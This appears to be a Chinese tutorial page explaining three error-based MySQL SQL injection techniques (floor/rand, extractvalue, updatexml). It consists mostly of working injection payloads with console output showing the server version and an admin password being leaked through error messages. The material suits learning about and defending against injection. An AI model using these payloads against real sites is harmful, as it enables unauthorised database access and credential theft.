程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
設為首頁 加入收藏
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> MySQL綜合教程 >> mysql3種報錯模式注入

mysql3種報錯模式注入

編輯:MySQL綜合教程

mysql3種報錯模式注入


1、通過floor報錯 可以通過如下一些利用代碼 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by...

1、通過floor報錯
可以通過如下一些利用代碼
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
舉例如下:
首先進行正常查詢:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id輸入存在注入的話,可以通過如下語句進行報錯。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了Mysql的版本,如果需要查詢其他數據,可以通過修改version()所在位置語句進行查詢。
例如我們需要查詢管理員用戶名和密碼:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
請看 ( http://www.yuefengqing.com/ )
2、ExtractValue
測試語句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
實際測試過程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3、UpdateXml
測試語句
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
實際測試過程

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));

ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

  1. 上一頁:
  2. 下一頁:
MySQL綜合教程
SQL 2005 清空日志的方法

SQL 2005 清空日志的方法   這個工具一清
[ShellCommand]MySQL集群全局一覽表

[ShellCommand]MySQL集群全局一覽表 a
Mysql性能優化小建議

Mysql性能優化小建議 Mysql的性能優化主要參考文
win7下Qt5使用mysql C++編程配置,win7qt5

win7下Qt5使用mysql C++編程配置,win7qt
MySQL延遲關聯性能優化方法

MySQL延遲關聯性能優化方法   這篇文章主要介
MYSQL組提交,mysql提交

MYSQL組提交,mysql提交   

相關文章
閱讀排行榜
MYSQL介紹安裝及一些問題解決,mysql介紹一些問題 Mysql學習(3)數據類型,mysql學習數據類型 mysql如何修改表類型(表引擎),mysql引擎 MySQL表字段名包含減號的問題 mysql command line client打不開(閃一下消失)的解決辦法 linux mysql MYD上傳問題 SQL 函數,sql函數 關於limit在後面為什麼會慢的問題 MySQL建立唯一索引實現插入重復自動更新,mysql自動更新 簡單的MySQL數據庫主從同步配置 MySQL索引簡單分析
熱門圖文
linux下建立mysql鏡像數據庫 Linux系統下啟動MySQL的命令及相關知識 ADO.NET數據庫訪問技術 OracleSQL性能優化 MySQL DELETE語法使用詳細解析 MySQL 復習筆記,mysql復習筆記 EAServer Performance Tuning Techniques Windows2012配置SQLServer2014AlwaysOn的圖解
欄目導航
MYSQL入門知識SQL基礎知識關於MYSQL數據庫Mariadb數據庫MySQL綜合教程
Copyright © 程式師世界 All Rights Reserved